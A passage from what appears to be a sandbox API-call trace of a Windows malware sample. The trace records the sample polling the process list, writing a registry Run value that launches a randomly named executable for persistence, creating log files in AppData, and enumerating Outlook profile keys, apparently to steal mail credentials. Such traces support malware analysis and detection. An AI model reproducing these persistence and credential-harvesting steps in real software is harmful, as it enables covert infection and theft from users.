SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0225.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.600] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0225.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0225.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0225.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0225.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0225.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0225.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.802] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0225.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0225.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0225.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0225.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0225.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0226.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.193] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0226.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0226.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0226.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0226.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0226.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0226.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.503] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0226.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0226.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0226.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0226.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0226.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0226.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.897] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0226.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0226.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0226.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0226.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0226.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0227.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.218] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0227.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0227.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.407] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0227.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0227.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.598] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0227.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0227.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.865] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0227.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0228.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.464] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0228.477] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xdea4c | out: TokenHandle=0xdea4c*=0xb4) returned 0x0 [0228.478] NtQueryInformationToken (in: TokenHandle=0xb4, TokenInformationClass=0x14, TokenInformation=0xdea44, TokenInformationLength=0x4, ReturnLength=0xdea48 | out: TokenInformation=0xdea44, ReturnLength=0xdea48) returned 0x0 [0228.478] NtClose (Handle=0xb4) returned 0x0 [0228.578] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea1c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.599] NtCreateFile (in: FileHandle=0xdea3c, DesiredAccess=0x12019f, ObjectAttributes=0xdea04*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea24, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea3c*=0x0, IoStatusBlock=0xdea24*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.628] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0228.628] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea0c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.628] NtCreateFile (in: FileHandle=0xdea2c, DesiredAccess=0x120089, ObjectAttributes=0xde9f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea14, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea2c*=0x0, IoStatusBlock=0xdea14*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.628] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0228.639] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde61c | out: TokenHandle=0xde61c*=0xb4) returned 0x0 [0228.639] NtQueryInformationToken (in: TokenHandle=0xb4, TokenInformationClass=0x1, TokenInformation=0xdde14, TokenInformationLength=0x400, ReturnLength=0xde614 | out: TokenInformation=0xdde14, ReturnLength=0xde614) returned 0x0 [0228.639] ConvertSidToStringSidW (in: Sid=0xdde1c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde618 | out: StringSid=0xde618*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0228.640] NtClose (Handle=0xb4) returned 0x0 [0228.796] NtCreateKey (in: KeyHandle=0xdea54, DesiredAccess=0x2021f, ObjectAttributes=0xde618*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea54*=0x0) returned 0xc0000022 [0228.805] NtCreateKey (in: KeyHandle=0xdea54, DesiredAccess=0x2021f, ObjectAttributes=0xde618*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea54*=0xb4) returned 0x0 [0228.856] NtSetValueKey (in: KeyHandle=0xb4, ValueName="JT2LG", TitleIndex=0x0, Type=0x1, Data="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", DataSize=0x5e | out: Data="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe") returned 0x0 [0228.861] NtClose (Handle=0xb4) returned 0x0 [0228.861] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.861] NtCreateFile (in: FileHandle=0xdea40, DesiredAccess=0x12019f, ObjectAttributes=0xdea08*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea28, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea40*=0x0, IoStatusBlock=0xdea28*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.861] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0228.861] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea10, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.861] NtCreateFile (in: FileHandle=0xdea30, DesiredAccess=0x120089, ObjectAttributes=0xde9f8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea18, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea30*=0x0, IoStatusBlock=0xdea18*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0228.861] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0228.861] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8", NtPathName=0xdea30, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.861] NtCreateFile (in: FileHandle=0xdea50, DesiredAccess=0x100181, ObjectAttributes=0xdea18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea38, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x21, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea50*=0xb4, IoStatusBlock=0xdea38*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0228.863] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0228.863] NtQueryInformationFile (in: FileHandle=0xb4, IoStatusBlock=0xdea38, FileInformation=0xde9d8, Length=0x28, FileInformationClass=0x4 | out: IoStatusBlock=0xdea38, FileInformation=0xde9d8) returned 0x0 [0228.875] NtSetInformationFile (FileHandle=0xb4, IoStatusBlock=0xdea38, FileInformation=0xde9d8, Length=0x28, FileInformationClass=0x4) returned 0x0 [0228.876] NtClose (Handle=0xb4) returned 0x0 [0228.885] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log.ini", NtPathName=0xdea20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.885] NtCreateFile (in: FileHandle=0xdea40, DesiredAccess=0x12019f, ObjectAttributes=0xdea08*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea28, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea40*=0xb4, IoStatusBlock=0xdea28*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0228.887] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0228.887] NtClose (Handle=0xb4) returned 0x0 [0228.898] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xde3b8 | out: TokenHandle=0xde3b8*=0xb4) returned 0x0 [0228.898] NtQueryInformationToken (in: TokenHandle=0xb4, TokenInformationClass=0x1, TokenInformation=0xddbb0, TokenInformationLength=0x400, ReturnLength=0xde3b0 | out: TokenInformation=0xddbb0, ReturnLength=0xde3b0) returned 0x0 [0228.898] ConvertSidToStringSidW (in: Sid=0xddbb8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xde3b4 | out: StringSid=0xde3b4*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0228.898] NtClose (Handle=0xb4) returned 0x0 [0228.898] NtCreateKey (in: KeyHandle=0xdea2c, DesiredAccess=0x20219, ObjectAttributes=0xde3b4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea2c*=0x0) returned 0xc0000034 [0228.898] NtCreateKey (in: KeyHandle=0xdea2c, DesiredAccess=0x20219, ObjectAttributes=0xde3ac*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea2c*=0x0) returned 0xc0000034 [0228.899] NtCreateKey (in: KeyHandle=0xdea2c, DesiredAccess=0x20219, ObjectAttributes=0xde3c8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea2c*=0xb4) returned 0x0 [0228.900] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xde2a4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.900] NtCreateFile (in: FileHandle=0xde2c4, DesiredAccess=0x120089, ObjectAttributes=0xde28c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde2ac, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde2c4*=0x0, IoStatusBlock=0xde2ac*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0228.900] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0228.900] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xde2bc, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0228.900] NtCreateFile (in: FileHandle=0xde2dc, DesiredAccess=0x12019f, ObjectAttributes=0xde2a4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde2c4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde2dc*=0x138, IoStatusBlock=0xde2c4*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0228.902] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0228.902] NtQueryInformationFile (in: FileHandle=0x138, IoStatusBlock=0xde2c4, FileInformation=0xde21c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xde2c4, FileInformation=0xde21c) returned 0x0 [0229.267] NtWriteFile (in: FileHandle=0x138, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xde2c4, Buffer=0x705c78*, Length=0x28, ByteOffset=0xde234*=0, Key=0x0 | out: IoStatusBlock=0xde2c4, Buffer=0x705c78*) returned 0x0 [0236.148] NtClose (Handle=0x138) returned 0x0 [0236.185] NtEnumerateKey (in: KeyHandle=0xb4, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddf7c, Length=0x200, ResultLength=0xde3c4 | out: KeyInformation=0xddf7c, ResultLength=0xde3c4) returned 0x0 [0236.194] NtCreateKey (in: KeyHandle=0xde3d0, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3d0*=0x138) returned 0x0 [0236.195] NtEnumerateKey (in: KeyHandle=0x138, Index=0x0, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: 